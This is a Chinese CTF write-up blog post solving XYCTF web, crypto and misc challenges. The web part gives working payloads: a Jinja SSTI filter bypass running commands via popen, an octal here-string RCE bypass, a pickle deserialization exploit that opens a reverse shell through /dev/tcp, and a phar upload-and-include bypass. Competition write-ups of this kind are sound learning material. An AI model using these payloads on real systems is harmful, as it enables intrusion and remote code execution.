<h2 id="我是一个复读机"><a href="#我是一个复读机" class="headerlink" title="我是一个复读机"></a>我是一个复读机</h2><p>爆破密码admin&#x2F;asdqwe<br>然后不知道如何时候尝试ssti发现<code>&#123;&#123;&#125;&#125;</code>都被过滤,xss测试可以弹窗<br>提示不能识别中文，输入中文发现会回显花括号，输入两个中文回显两对花括号，盲猜可以在两个中文后面模板注入，输入我去9+9发现回显18<br>然后就是用request绕过<br>然后发现还得用<code>&#123;%%&#125;</code>这种形式然后前面加上一个中文<br>并且测试发现attr request没被过滤<br>exp:<code>sentence=%E4%B8%80%print%20(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()%&amp;a=__globals__&amp;b=os&amp;c=cat%20/flag</code><br><img src="https://ooo.0x0.ooo/2024/04/28/OpEVvi.png" alt="OpEVvi.png" loading="lazy"></p>
<h2 id="ezRCE"><a href="#ezRCE" class="headerlink" title="ezRCE"></a>ezRCE</h2><p>只有数字发现可以用8进制绕过<br>但是无法执行有参数的指令<br>用两次here-strings绕过<br><code>exp: cmd=$0&lt;&lt;&lt;$0&lt;&lt;&lt;$&#39;\143\141\164\40\57\146\154\141\147&#39;</code><br><img src="https://ooo.0x0.ooo/2024/04/28/OpEYcX.png" alt="OpEYcX.png" loading="lazy"></p>
<h2 id="ezClass"><a href="#ezClass" class="headerlink" title="ezClass"></a>ezClass</h2><p>还是php原生类利用，不多赘述<br><img src="https://ooo.0x0.ooo/2024/04/28/OpElOt.png" alt="OpElOt.png" loading="lazy"></p>
<h2 id="login"><a href="#login" class="headerlink" title="login"></a>login</h2><p><img src="https://ooo.0x0.ooo/2024/04/28/OpE9Nx.png" alt="OpE9Nx.png" loading="lazy"><br>在注册界面随便注册一个账号<br><img src="https://ooo.0x0.ooo/2024/04/28/OpEjLj.png" alt="OpEjLj.png" loading="lazy"><br>可以看到RemberMe后面像是pickle反序列化<br>构造一手<br>测试发现reduce被过滤<br>参考文章<br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/89132768">从零开始python反序列化攻击：pickle原理解析 &amp; 不用reduce的RCE姿势 - 知乎 (zhihu.com)</a><br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/361349643">pickle反序列化的利用技巧总结 - 知乎 (zhihu.com)</a><br>exp：</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> base64
data<span class="token operator">=</span><span class="token triple-quoted-string string">b'''(cos
system
S'bash -c "bash -i >&amp; /dev/tcp/vps/port 0>&amp;1"'
o.'''</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>base64<span class="token punctuation">.</span>b64encode<span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">)</span></code></pre>
<p><img src="https://ooo.0x0.ooo/2024/04/28/OpE2up.png" alt="OpE2up.png" loading="lazy"></p>
<h2 id="pharme"><a href="#pharme" class="headerlink" title="pharme"></a>pharme</h2><p><img src="https://ooo.0x0.ooo/2024/04/28/OpE8FU.png" alt="OpE8FU.png" loading="lazy"><br>想执行eval就需要截断掉后面的字符，使用<code>HALT_COMPILER()</code>函数<br><img src="https://ooo.0x0.ooo/2024/04/28/OpEXPY.png" alt="OpEXPY.png" loading="lazy"><br>然后构造phar 序列化<br><img src="https://ooo.0x0.ooo/2024/04/28/OpEu9v.png" alt="OpEu9v.png" loading="lazy"><br>生成exp.phar,上传测试发现只能上传jpg，并且过滤HALT_COMPILER,先用gzip加工一下<br>然后再修改成jpg后缀上传<br><img src="https://ooo.0x0.ooo/2024/04/28/OpE3Uq.png" alt="OpE3Uq.png" loading="lazy"><br>然后再class.php里面包含phar文件，又过滤了<code>phar://</code>头，使用<code>compress.zlib://phar://</code><br><img src="https://ooo.0x0.ooo/2024/04/28/OpECvc.png" alt="OpECvc.png" loading="lazy"></p>
<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="Sign1n签到"><a href="#Sign1n签到" class="headerlink" title="Sign1n签到"></a>Sign1n签到</h2><pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> Crypto<span class="token punctuation">.</span>Util<span class="token punctuation">.</span>number <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">from</span> tqdm <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">import</span> gmpy2

m<span class="token operator">=</span><span class="token number">12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567891134567780112455778012234677900124556899112356679901344568891223556780113345788901245667900134456899023355788001344568991133566789112455688902335578800133467889112456679901245567991223557880013355689911334677891124556889122355788001245568990233566789112455779902335577801124457889112346779911344578801233467789112355779912234577990233556780113</span>
<span class="token keyword">def</span> custom_reduce<span class="token punctuation">(</span>input_str<span class="token punctuation">)</span><span class="token punctuation">:</span>  
    input_list <span class="token operator">=</span> <span class="token builtin">list</span><span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>input_str<span class="token punctuation">)</span><span class="token punctuation">)</span>  
    length <span class="token operator">=</span> <span class="token builtin">len</span><span class="token punctuation">(</span>input_list<span class="token punctuation">)</span>
    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>length<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token punctuation">(</span>i<span class="token operator">+</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">10</span><span class="token operator">==</span><span class="token builtin">int</span><span class="token punctuation">(</span>input_list<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            input_list<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token operator">=</span><span class="token string">'0'</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            input_list<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token operator">=</span><span class="token string">'1'</span>
    result <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">.</span>join<span class="token punctuation">(</span>input_list<span class="token punctuation">)</span>
    <span class="token keyword">return</span> result
a<span class="token operator">=</span>custom_reduce<span class="token punctuation">(</span>m<span class="token punctuation">)</span>
<span class="token keyword">def</span> swap_bits<span class="token punctuation">(</span>input_str<span class="token punctuation">)</span><span class="token punctuation">:</span> 
    input_list <span class="token operator">=</span> <span class="token builtin">list</span><span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>input_str<span class="token punctuation">)</span><span class="token punctuation">)</span> 
    length <span class="token operator">=</span> <span class="token builtin">len</span><span class="token punctuation">(</span>input_list<span class="token punctuation">)</span>  
    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>length <span class="token operator">//</span> <span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  
        temp <span class="token operator">=</span> input_list<span class="token punctuation">[</span>i<span class="token punctuation">]</span>  
        input_list<span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token operator">=</span> input_list<span class="token punctuation">[</span>length <span class="token operator">-</span> <span class="token number">1</span> <span class="token operator">-</span> i<span class="token punctuation">]</span> 
        input_list<span class="token punctuation">[</span>length <span class="token operator">-</span> <span class="token number">1</span> <span class="token operator">-</span> i<span class="token punctuation">]</span> <span class="token operator">=</span> temp  

    <span class="token keyword">return</span> <span class="token string">''</span><span class="token punctuation">.</span>join<span class="token punctuation">(</span>input_list<span class="token punctuation">)</span>  
b<span class="token operator">=</span>swap_bits<span class="token punctuation">(</span>a<span class="token punctuation">)</span>
<span class="token keyword">while</span> b<span class="token punctuation">.</span>endswith<span class="token punctuation">(</span><span class="token string">'0'</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    b <span class="token operator">=</span> b<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>
s1<span class="token operator">=</span><span class="token string">'00'</span><span class="token operator">+</span>b
s11<span class="token operator">=</span>long_to_bytes<span class="token punctuation">(</span><span class="token builtin">int</span><span class="token punctuation">(</span>s1<span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token comment">#print(int(s1,2))</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s11<span class="token punctuation">)</span></code></pre>
<h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="熊博士"><a href="#熊博士" class="headerlink" title="熊博士"></a>熊博士</h2><p>埃特巴什解码<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGaNG.png" alt="OpGaNG.png" loading="lazy"></p>
<h2 id="game"><a href="#game" class="headerlink" title="game"></a>game</h2><p>谷歌搜图<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGoE1.png" alt="OpGoE1.png" loading="lazy"><br><img src="https://ooo.0x0.ooo/2024/04/28/OpGquI.png" alt="OpGquI.png" loading="lazy"><br><code>Papers,Please</code></p>
<h2 id="zzl的护理小课堂"><a href="#zzl的护理小课堂" class="headerlink" title="zzl的护理小课堂"></a>zzl的护理小课堂</h2><p>看一下源码<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGBFD.png" alt="OpGBFD.png" loading="lazy"><br>把执行输出flag的指令再控制台执行一遍就行了<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGTRF.png" alt="OpGTRF.png" loading="lazy"></p>
<h2 id="ez隐写"><a href="#ez隐写" class="headerlink" title="ez隐写"></a>ez隐写</h2><p><img src="https://ooo.0x0.ooo/2024/04/28/OpGU96.png" alt="OpGU96.png" loading="lazy"><br>两处伪加密修改成00<br>hint.png修复长宽<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGbUP.png" alt="OpGbUP.png" loading="lazy"><br>试了几下发现解压密码是20240401<br>拿到一张水印图片<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGkyb.png" alt="OpGkyb.png" loading="lazy"><br>然后提取一下隐形水印<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGxdl.png" alt="OpGxdl.png" loading="lazy"></p>
<h2 id="ZIP神之套"><a href="#ZIP神之套" class="headerlink" title="ZIP神之套"></a>ZIP神之套</h2><p>用ida打开exe文件看到有字符串xyctf????????ftcyx<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGFag.png" alt="OpGFag.png" loading="lazy"><br>猜测压缩包的掩码攻击<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGheB.png" alt="OpGheB.png" loading="lazy"><br>爆破出来密码是xyctf20240402ftcyx<br>打开之后有两个文件 一个加密一个不加密，文件内容极其相似<br>明文攻击<br>恢复密钥然后还原就能打开了<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGiEs.png" alt="OpGiEs.png" loading="lazy"></p>
<h2 id="TCPL"><a href="#TCPL" class="headerlink" title="TCPL"></a>TCPL</h2><p>用UCB RISC-V架构执行TCPL文件<br>环境搭建参考<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_63922192/article/details/133495747">https://blog.csdn.net/qq_63922192/article/details/133495747</a><br><img src="https://ooo.0x0.ooo/2024/04/28/OpGnIK.png" alt="OpGnIK.png" loading="lazy"><br>flag里面的1换成0就ok了</p>
<h2 id="网络追踪"><a href="#网络追踪" class="headerlink" title="网络追踪"></a>网络追踪</h2><p>根据最后几个包知道靶机ip是192.168.204.133<br><img src="https://ooo.0x0.ooo/2024/04/28/OpG7ha.png" alt="OpG7ha.png" loading="lazy"><br>通过三次握手过滤出开放的端口<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGNRS.png" alt="OpGNRS.png" loading="lazy"><br>发现开放445 139 135三个端口<br>根据SMB 445 windows xp 搜索相关cve<br>试了好多才试出来<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGejN.png" alt="OpGejN.png" loading="lazy"></p>
<h2 id="Osint2"><a href="#Osint2" class="headerlink" title="Osint2"></a>Osint2</h2><p>根据洛阳龙门站点和实践15:10搜索到相关车次<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGAUC.png" alt="OpGAUC.png" loading="lazy"><br>然后搜了一下发现G3292搜不到，车次就是G3293<br>再搜洛阳必去景点试了几个<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGKyL.png" alt="OpGKyL.png" loading="lazy"><br>第二个老君山就是的</p>
<h2 id="彩蛋"><a href="#彩蛋" class="headerlink" title="彩蛋"></a>彩蛋</h2><p><img src="https://ooo.0x0.ooo/2024/04/28/OpGZsi.png" alt="OpGZsi.png" loading="lazy"><br>两串数字对应开头和结尾flag<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGyaX.png" alt="OpGyaX.png" loading="lazy"><br>第一段XYCTF<code>&#123;this_a_</code><br><img src="https://ooo.0x0.ooo/2024/04/28/OpGget.png" alt="OpGget.png" loading="lazy"><br>第三段<code>find_it&#125;</code><br>中间那段找了很长时间，跟最开始的想法一样隐写再图片里了<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGmGx.png" alt="OpGmGx.png" loading="lazy"><br>这个图片先转webp转png然后lsb隐写<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGpIj.png" alt="OpGpIj.png" loading="lazy"><br><img src="https://ooo.0x0.ooo/2024/04/28/OpGPhp.png" alt="OpGPhp.png" loading="lazy"><br>好奇怪的编码不过keyborad也算小小提示<br>第二段bl0ckbuster_for_png_and_i_think_yon_can_<br>XYCTF{this_a_bl0ckbuster_for_png_and_i_think_yon_can_find_it}</p>
<h2 id="Osint1"><a href="#Osint1" class="headerlink" title="Osint1"></a>Osint1</h2><p>小红书有人发了，在南通海安最东面沿海<br>高德地图跟一下发现最东边有条路滨海东路正好跟图片里面的一样<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGHgq.png" alt="OpGHgq.png" loading="lazy"><br><img src="https://ooo.0x0.ooo/2024/04/28/OpGLsc.png" alt="OpGLsc.png" loading="lazy"></p>
<h2 id="真-签到"><a href="#真-签到" class="headerlink" title="真&gt;签到"></a>真&gt;签到</h2><p>放到010就出了<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGGor.png" alt="OpGGor.png" loading="lazy"></p>
<h2 id="Ez-Base1024-2"><a href="#Ez-Base1024-2" class="headerlink" title="Ez_Base1024*2"></a>Ez_Base1024*2</h2><p><img src="https://ooo.0x0.ooo/2024/04/28/OpGQrM.png" alt="OpGQrM.png" loading="lazy"></p>
<h2 id="Ez-osint"><a href="#Ez-osint" class="headerlink" title="Ez_osint"></a>Ez_osint</h2><p>用stegsolve可以看到水印<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGSGG.png" alt="OpGSGG.png" loading="lazy"><br>根据时间搜索相关时光邮件<br>好在ulr可以跳转页数<br>最后定位然后在评论区找到flag<br><img src="https://ooo.0x0.ooo/2024/04/28/OpG031.png" alt="OpG031.png" loading="lazy"></p>
<h2 id="美妙的歌声"><a href="#美妙的歌声" class="headerlink" title="美妙的歌声"></a>美妙的歌声</h2><p>audition打开拿到密码<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGdhI.png" alt="OpGdhI.png" loading="lazy"><br>然后用deepsound解密<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGstD.png" alt="OpGstD.png" loading="lazy"><br>提取出flag<br><img src="https://ooo.0x0.ooo/2024/04/28/OpGV2F.png" alt="OpGV2F.png" loading="lazy"></p>
</div></section><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>ta0</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://tao0845.github.io/posts/545cd3ac/" title="XYCTF个人wp">https://tao0845.github.io/posts/545cd3ac/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/posts/7345579c/" rel="prev" title="XYCTF未解题复现"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">XYCTF未解题复现</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/posts/4666d2e/" rel="next" title="帕鲁杯my love复现"><span class="post-nav-text">帕鲁杯my love复现</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2024 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> ta0</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.1.1</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div><div id="busuanzi"><span id="busuanzi_container_site_uv" title="总访客量"><span><span class="icon iconify" data-icon="ri:user-line"></span></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><span class="icon iconify" data-icon="ri:eye-line"></span></span><span id="busuanzi_value_site_pv"></span></span><script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:search-line"></span></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="https://fastly.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js"></script><script src="/js/search/local-search.js" defer type="module"></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><span class="icon iconify" data-icon="ri:close-line"></span></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div class="search-result-container"></div></div><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>